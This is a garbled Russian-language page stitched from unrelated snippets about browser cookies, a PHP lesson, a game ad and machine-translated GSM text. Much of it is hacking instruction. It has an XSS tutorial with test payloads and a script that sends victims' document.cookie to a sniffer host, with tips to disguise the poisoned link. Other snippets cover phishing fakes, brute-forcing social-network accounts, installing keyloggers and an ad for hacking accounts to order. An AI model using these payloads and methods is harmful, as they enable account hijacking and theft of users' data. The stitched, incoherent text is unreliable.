Вадим Стеркин

Мой знакомый забыл пароль к одному сайту. Однако ранее он поставил при входе флажок «Запомнить меня» в браузере Google Chrome, что позволяло ему заходить на сайт под своим аккаунтом. Мне прилетел вопрос, можно ли перенести это волшебное состояние на другой компьютер. Правильнее, конечно, было бы сменить или восстановить пароль, но сделать это знакомый не мог по причинам, не относящимся к делу.

Как пользоваться intercepter-ng для чайников

Несмотря на многообразие выбора современного софта, программы для взлома на андроид лучше, чем intercepter ng найти сложно. Первым критерием, указывающим в пользу данного продукта, является его реальная работоспособность. Большинство предлагаемых снифферов в сети – только имитация, не выполняющая заявленных функций.

Следующими положительными факторами является многофункциональность приложения и охват широкой аудитории пользователей.

Компьютерная помощь 939-29-71

Начнём по порядку. Cookies или » куки » — это очень маленькие текстовые файлики — закладки с информацией.

Эту информацию веб — сервер передает на браузер пользователя. где эта информация и хранится до востребования. Не совсем понятно. Ну. хорошо.

постараюсь ещё проще. Смотрите. вы зарегистрировались на каком — либо сайте.

В момент регистрации и создаются эти самые » куки «.

Вот они — то и являются.

Cookie Cadger

Программа прослушивает трафик в WiFi-сети, перехватывает cookies и реплицирует сессию пользователя в вашем браузере, повторяя запросы с его учётными данными. Автор Мэтью Салливан (Matthew Sullivan) провёл презентацию программы 30 сентября на конференции хакеров Derbycon. Прямо во время выступления Мэтью Салливан перехватил по WiFi незащищённую сессию с Google одного из посетителей конференции.

Как украсть куки

Если, находясь на странице сайта, Вы введёте в адресную строку браузера Firefox или Opera следующий текст: javasсript:document.write(document.сооkiе); то увидите нечто вроде: remixAdminsBar=0; remixGroupType=0; remixpass=******************; remixwall=0; remixInformation=0; remixMembersBar=0; remixdescription=0; remixautobookmark=8; remixemail=*******; remixmid=23363; remixchk=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; remixvideos=0; remixRecentNews=0; remixAlbumsBar=0 Внимание! .

Полное пособие по межсайтовому скриптингу

XSS – это тип уязвимости программного обеспечения, свойственный Web-приложениям, который позволяет атакующему внедрить клиентский сценарий в web-страницы, просматриваемые другими пользователями В Wikipedia содержится следующее определение для XSS: «Межсайтовый скритинг (XSS) – это тип уязвимости программного обеспечения, свойственный Web-приложениям (путем обхода ограничений безопасности браузера)», который позволяет атакующему внедрить клиентский сценарий в web-страницы, просматриваемые другими пользователями.

Разница между cookie и сессиями

Не так давно я писал статью о том, как сделать регистрацию и авторизацию пользователей на сайте.

И там я написал, что при авторизации надо записать информацию об этом (логин и шифрованный пароль) в cookie . либо в сессию. Однако, возникает вопрос: » Что же выбрать: cookie или сессии ?

«. В этой статье я собираюсь разобрать разницу между сессиями и cookie . чтобы Вы окончательно определились с выбором.

Идеальный муж и я, или как украсть 55 поцелуев

1. Отключаете в браузере все плагины блокировки рекламы (адблок, адгвард, антишок и т.д.).

Проверяете. 2. Отключаете режим турбо (если есть в браузере). Проверяете. 3. Проверяете тут уровень поддержки html5 вашим браузером.

Там есть кнопка save results, ссылку на результат отправляете администратору сайта вместе с описанием проблемы и указанием вашего браузера.

— почистите кеш/куки (cookies) в браузере — отключите все плагины/скрипты (AdGuard, Adblock и т.

PHP для начинающих

Всем хорошего дня. Перед вами первая статья из серии разработчиков.

Это будет необычная серия статей, тут не будет echo «Hello World».

тут будет hardcore из жизни PHP программистов с небольшой примесью “домашней работы” для закрепления материала.

Начну с сессий – это один из самых важных компонентов, с которыми вам придется работать. Не понимая принципов его работы – наворотите делов.

Вы на сайте самой прогрессивной Он-Лайн игры Воины и Маги.

Здесь вы можете с удовольствием провести время, познакомиться с интересными людьми и найти себе друзей. Это ролевая игра. Вам предстоит играть за своего персонажа в мире ВиМ, совершенствовать его навыки и умения, проводить бои, участвовать в чемпионатах, заключать союзы или враждовать с другими игроками.

Уникальная система сражений, разработанная для игры, превращает битвы в увлекательные поединки и захватывающие баталии.

Cookies. Нет, речь вовсе не о печенье, речь о вашей безопасности. Вот заходите вы свой любимый сайт «vkontakte» (или, например, посмотреть почту) на чужом компьютере, отказываетесь от опции «сохранить пароль», радостно просматриваете почту и уходите. И не задумываетесь о том, что под вашим именем теперь можно зайти в социальную сеть или почту.

Я даже не рассматриваю ситуацию с программой, которая запомнила пароль без вашего ведома. Это уже взлом сознательный, и вы, наверное, будете подозревать, что что-то такое может случиться и не зайдете на таком компьютере на любимый сайт. Но речь может идти о простом человеческом любопытстве — были в гостях у знакомых, а тут раз, и они получают возможность почитать вашу почту. Вы уверены, что они откажутся от такой возможности? А вы не боитесь, что что-то выплывет? В любом случае, я отложу вопросы нравственности и просто поговорю о том, каким образом созраняется на компьютере информация о том, что вас теперь можно пустить на какой-то сайт не запрашивая пароля.

как украсть Cookie

И имя этой технологии — cookies.

А началось все вот с чего. Протокол http по которому, собственно, вы и просматриваете сайты (включая этот) изначально не предполагал возможности поддержания соединения. То есть, грубо говоря, вы отправляете запрос на сайт, получаете ответ, он отображается на экране, а дальше сервер ничего о вас не помнит. Это, конечно, хорошо, когда сайт чисто информационный и не должен ничего о вас помнить, но мы же живем в веке Web 2.0 😉 Естественное развитие протокола — POST и GET запросы, когда вы отправляете какие-то данные, сервер может записать их в базу данных, но и этого оказывается недостаточно.

Рассмотрим очень простой пример. Форум. Вот вы зарегистрировались, и на форуме есть запись о том, что есть такой-то пользователь с таким-то паролем и какими-то еще дополнительными данными. Но вот теперь вы заходите на форум и авторизуетесь — вводите свой пароль. Где-то должна сохраниться информация о том, что вы авторизовались. На сервере? Конечно, нет! На сервере невозможно сохранить информацию о том, что именно с вашего компьютера была произведена авторизация — он не сможет отличить вас от кого-то другого (даже ваш IP-адрес вас не идентифицирует однозначно)! Таким образом, информацию о том, что произошла авторизация нужно хранить на вашем компьютере. Вот зачем нужны cookies, именно для этого они и были созданы.

Cookie — это маленькая запись на вашем компьютере, хранящая информацию о сайте, который вы посетили. При авторизации создается подобная запись, после чего вы уже можете гулять по форуму, и он будет вас опознавать. Однако, это уже будет происходить автоматически — благодаря информации, хранящейся в cookie — так что сделать вид, что вы являетесь главным администратором форума, все равно не получится в обход проверки пароля.

Теперь можно вернуться к тому, с чего начиналась эта статья. Если вы авторизовались где-то даже не сохраняя пароль, то может случиться так, что на компьютере создалась запись, позволяющая теперь входить на этот ресурс под вашим именем без авторизации. Такая запись сама устареет через некоторое время, но можно ее принудительно очистить. В каждом браузере это делается по-своему, я покажу, как это можно сделать в моем любимом Google Chrome. Открываем параметры

Переходим на вкладку «расширенные» и находим кнопку «показать Cookies»

Теперь, конечно, можно удалить и все cookies, но это может расстроить хозяина компьютера. Поэтому, например, в верхнем поле можно ввести название интересуещего вас сайта

Тогда можно произвести очистку только cookies, относящихся к этому сайту. Можете попробовать на моем. При этом если вы авторизуетесь на моем форуме, а затем очистите cookies, то информация об авторизации будет забыта. Попробуйте!

comments powered by

1.Что такое XSS(англ. Сross Site Sсriрting — «межсайтовый скриптинг»)
Уязвимость типа XSS позволяет вставить произвольный javascript код в тело страницы. Атака XSS отличается от других(напр. SQL injection или PHP injection) тем, что действует не на сервер, а на клиента.

как украсть cookies

С ее помощью нельзя посмотреть таблицы БД, залить шелл и т.п. Чаще всего XSS испульзуют для кражи cookies.
Cookies(Куки) — небольшой фрагмент данных, созданный веб-сервером и хранимый на компьютере пользователя в виде файла. Обычно куки используются для хранения учетных записей, и, чаще всего, в них находятся закодированные пароль, логин, и идентификатор сессии.(хотя далеко не всегда)
XSS бывают двух типов, активные и пассивные.

Пассивные XSS требуют от жертвы непосредственного участия, например перейти по ссылке, содержащей javascript код. При использовании этого типа XSS не обойтись без СИ(Социальная Инженерия)

Активные XSS не требуют никакого участия со стороны жертвы, ей достаточно лишь зайти на страницу с XSS. Активные XSS могут быть, например, в сообщениях на форумах, чатах, в добавлении новости и т.п.

2.Поиск XSS
В этом пункте я расскажу как найти xss

2.1.Пассивные XSS
Чтобы найти пассивную XSS достаточно подставить в форму ввода <script>alert(‘xss’)</script> если скрипт сработал и появилось сообщение "xss" значит уязвимость присутствует, если скрипт не сработал можно еще попробывать "><script>alert()</script>, это, наверное самая распространенная xss уязвимость. Если ни тот ни другой скрипт не сработал то уязвимости, скорее всего, нет.
Рассмотрим на примере.
http://miss.rambler.ru/srch/?sort=0&amp … amp;words=
Видите форму "искать"? вставим туда "><script>alert()</script> и нажмем "найти"
Вылетело окошко c xss, значит xss присутствует.(возможно, на момент прочтения вами данной статьи эту xss уже пофисят)

2.2.Активные XSS
Такие ксс могут быть, например, в полях профиля, при добавлении новости в названии новости и в самой новости(реже), в сообщениях на форумах/чатах/гостивухах при включенном html. Тут все просто, вписываем в поля скрипт из предыдущего подпункта, и если сообщение вывелось на экран, то уязвимость присутствует.
Рассморим xss в BB тегах на форумах.
можно попробовать тупо вставить javascript код в тег, например так:
[IM*G]javasсriрt:alert(‘xss’)[/IM*G]
У некоторых тегов есть параметры, например у тега [img] есть параметры dynsrc и lowsrc, попробуем подставить код так:
[im*g]http://www.site.ru/image.jpg dynsrc=javascript:alert(‘xss’)[/im*g]
Если скрипт сработал, xss есть

3.Использование XSS для кражи cookies
Теперь самое вкусное))))
Для того чтобы украсть куки нам понадобится веб-сниффер, можно установить какой-нибудь сниффер на свой хостинг, а можно воспользоваться онлайн-сниффером, которых сейчас полно.
Чтобы украсть куки через пассивеую XSS надо чтобы жертва прошла по ядовитой ссылке. Чтобы украсть куки мы будем исользовать вместо <script>alert(‘xss’)</script> другой скрипт:<script>
img = new Image();
img.src = "адрес картинки-сниффера"+document.cookie;
</script>
подставляем скрипт в ссылку и даем жертве перейти по ней, смотри лог сниффера и радуемся.
Рассмотрим на примере.
Возьмем ту XSS на рамблере из предыдущего пункта.
Вставляем
"><script>
img = new Image();
img.src = "адрес картинки-сниффера"+document.cookie;
</script>
в форму поиска, нажимаем "найти", смотрим адресную строку и видим:

http://miss.rambler.ru/srch/?sort=0&amp … &words ="><script>img = new Image();img.src = "адрес картинки-сниффера"+document.cookie;</script>
Кидаем эту ссылку жертве и радуемся кукам.
Увидев такую ссылку жертва может что-то заподозрить, поэтому желательно закодировать
"><script>img = new Image();img.src = "адрес картинки-сниффера"+document.cookie;</script>
в URL Или воспользоваться сервисами типа http://tinyurl.com/
Перейдем к активным XSS, тут все просто, вместо alert() вставляем img = new Image();img.src = "адрес картинки-сниффера"+document.cookie;

Теперь у нас есть куки. Но что с ними делать? Все просто, их надо подставить вместо своих. В браузере Opera есть встроеный редактор cookies(инструменты->дополнительно->управление cookies), для firefox есть плагин(не помню как называется, юзайте гугл)
На этом пока все, возможно статья будет дополняться

(с) источник: http://webxakep.net/forum/showthread.php?t=4338

0

Как украсть куки через сниффер

Привет всем я хотел рассказать о нескольких способах взлома профиля на сайте одноклассники.ru.
1.Способ :
Узнать адрес мыла жертвы взломать его (как взломать мыло вы можете почитать тут ) и попробовать восстановить пароль с помощью мыла.
2.Способ :
Фейк ну это вряд ли но можно попробовать как взламывать с помощью фейк возможно некоторые не знают я объясню :
Зарегистрировать хостинг с поддержкой PhP хостинг тут.

скачать фейк тут. залить все файлы и архива с фейком на сайт через FTP поставить на файл pass.txt права на запись 777 и дать ссылку жертве.
3.

Способ Брут с помощью скрипта на Active Perl где скачать брут и как им пользоваться. ответ: скачать брут можете здесь а как пользоваться да вот так.

4. Способ ну это уже вряд ли с помощью xss. Что такое xss можете узнать тут
и тут
значит так берем xss и после «=» вставляем код для пассивной xss атаки с сниффера
Ну чтож на этом всё удачи во взломах !
Tickhack HPC

__________________
Взлом почты и соц.сетей на заказ: https://hpc.name/showthread.php?p=427327#post427327
Ести ты читаешь эту надпись, значит ты читаешь эту надпись. И не делай такой удивлённый вид!

ОбзорниГ [email protected]

Проект уже успешно в течение первых 12 месяцев после его начала.

Основная цель заключалась в создании недорогих GSM реализации того, что было. Omho больше. Основные аппаратные работает с мобильного чипсета Analog Baseband Chip TWL3025, Rita Texas Instruments RF Chip TRF6151C, čo sa mobilného telefónu týka, primárny je Motorola C123. Calypso Цифровая база группы аналоговый чип Baseband Йота TWL3025, Рита Texas Instruments РФ Chip TRF6151C, что мобильный телефон Motorola C123 первичной.

Как взломать почту Gmail

На многих компьютерах пароля либо вообще нет, либо паролем служит слово admin.

1. Если хозяин компьютера не знает, что вы устанавливаете кейлоггер, то это является незаконным действием.
2. Процесс установки кейлоггера зависит от выбранной вами программы.

Запустите кейлоггер, чтобы он регистрировал нажатия клавиш. Процесс запуска зависит от выбранной вами программы.

Как пользоваться intercepter-ng для чайников

Хотя интерфейс программы реализован на английском, основные функции продублированы кнопками быстрого запуска. Для intercepter ng инструкция старта предельно проста: Выбрать сеть в верхней строке, актуально для нескольких подключений. Запустить сканирование, нажав кнопку, изображающую радар.

Активировать контекстное меню, нажав ПКМ.

Выбрать пункт Smart Scan.

Взлом VK

Но все равно я постараюсь писать, так чтобы всем было понятно. Итак, начнем! Украсть или быть обокраденным.

Социальная сеть Вконтакте — это пример, который тесно связан с этой темой. Все что описано ниже — касается бок о бок с аккаунтами: ВКонтакте, Твиттер, Facebook, Google и др. Как можно получить доступ к ресурсам .

которые почти невозможно взломать?

У них работает настолько грамотный штат специалистов, что пытаться обойти их систему защиты – выйдет себе дороже!

Вот представим, у нас есть банковский аккаунт, мы пользуемся любимым форумом и играем в какую-нибудь онлайн игру.

Cookie Cadger

Cookie Cadger — кросс-платформенная утилита на Java, сочетающая в себе мощь Wireshark и простой графический интерфейс. В рабочем окне программа показывает, какие сессии открыты на ноутбуке жертвы.

Можно выбрать любую сессию — и в один щелчок мыши воспроизвести её в своём браузере, путём воспроизведения таких же HTTP GET запросов с перехваченными cookies.

Новая программа CookieMonster ворует куки даже с защищенных сайтов

Единственной защитой против атак подобного рода является использование SSL/TLS, но до сих пор многие веб-разработчики так и не внедрили поддержку защищённых протоколов на своих сайтах.

Как воруют пароли от Вконтакте

и получить доступ ко всей информации которую он уже успел украсть и если постараться можно уничтожить её, тем самым мы спасём многие жизни пользователей в контакте. Почему именно « Жизни » может кто-то спросить.

А потому что, мне как-то раз посоветовали набрать на Ютюбе запрос «Жертвы в Контакте» и знаете, что? Я подумал, что конец света все-токи настал. Сразу нужно сказать. Для этих целей лучше всего установить виртуальную машины, да бы не запустить реальный троянец на основной системе.